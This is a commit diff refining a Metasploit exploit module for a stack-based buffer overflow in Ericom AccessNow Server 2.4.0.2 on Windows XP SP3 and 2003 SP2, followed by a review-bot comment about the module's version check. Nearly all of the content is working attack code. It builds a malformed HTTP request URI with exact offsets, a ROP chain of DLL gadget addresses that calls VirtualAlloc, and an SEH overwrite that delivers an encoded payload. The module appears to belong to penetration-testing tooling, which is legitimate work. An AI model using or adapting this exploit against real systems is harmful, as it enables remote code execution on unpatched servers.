Finish module
parent
8f8af0e93a
commit
1133332702
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
|
||||
vulnerability is due to an insecure usage of vsprintf with used controlled data,
|
||||
which can be triggered with a malformed HTTP request. This module has been tested
|
||||
successfully with Ericom AccessNow Server 2.4.0 on Windows XP SP3 and Windows 2003
|
||||
successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003
|
||||
Server SP2.
|
||||
},
|
||||
'Author' =>
|
||||
|
@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
|
@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Ericom AccessNow Server 2.4.0 / Windows [XP SP3 / 2003 SP2]',
|
||||
[ 'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',
|
||||
{
|
||||
'RopOffset' => 62,
|
||||
'Offset' => 30668,
|
||||
|
@ -63,22 +64,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'uri' => '/AccessNow/start.html'
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom AccessNow Server/
|
||||
return Exploit::CheckCode::Detected
|
||||
unless res && res.code == 200 && res.headers['Server']
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
if res.headers['Server'] =~ /Ericom AccessNow Server/
|
||||
return Exploit::CheckCode::Appears # Ericom AccessNow 2.4
|
||||
elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/
|
||||
return Exploit::CheckCode::Detected # Ericom AccessNow 3
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit_uri
|
||||
uri = "A " # To ensure a "malformed request" error message
|
||||
uri << "C" * (62)
|
||||
uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message
|
||||
uri << rand_text(target['RopOffset'])
|
||||
uri << create_rop_chain
|
||||
uri << payload.encoded
|
||||
print_status("#{Rex::Text.to_hex_dump(payload.encoded)}")
|
||||
uri << "B" * (0x77cc - uri.length)
|
||||
uri << "CCCC" #nseh
|
||||
uri << [0x104da1e5].pack("V") #seh
|
||||
uri << rand_text(target['Offset'] - uri.length)
|
||||
uri << rand_text(4) # nseh
|
||||
uri << [target.ret].pack("V") # seh
|
||||
|
||||
uri
|
||||
end
|
||||
|
@ -96,8 +102,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# rop chain generated with mona.py - www.corelan.be
|
||||
rop_gadgets =
|
||||
[
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure compatibility with all window versions
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
|
||||
0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3
|
||||
0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]
|
||||
0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]
|
||||
0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]
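Review bot: In the new check body (hunk `@ -63,22 +64,27 @@`), the guard `unless res && res.code == 200 && res.headers['Server']` returns `Exploit::CheckCode::Safe` when `res` is nil, so a target that never answered (timeout, refused connection — assuming the request helper returns nil in that case, as is usual in this framework) is reported as not vulnerable rather than as undetermined. Split the guard so that only a real non-matching reply is Safe: `return Exploit::CheckCode::Unknown unless res` followed by `return Exploit::CheckCode::Safe unless res.code == 200 && res.headers['Server']`. The `elsif` for the `Ericom Access Server` branch then re-tests `res && res.code == 200 && res.headers['Server']`, which the guard above already established, so it can shrink to `elsif res.headers['Server'] =~ /Ericom Access Server/`. The enclosing check method starts before the hunk, so the request that produces `res` is not visible here.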
|
||||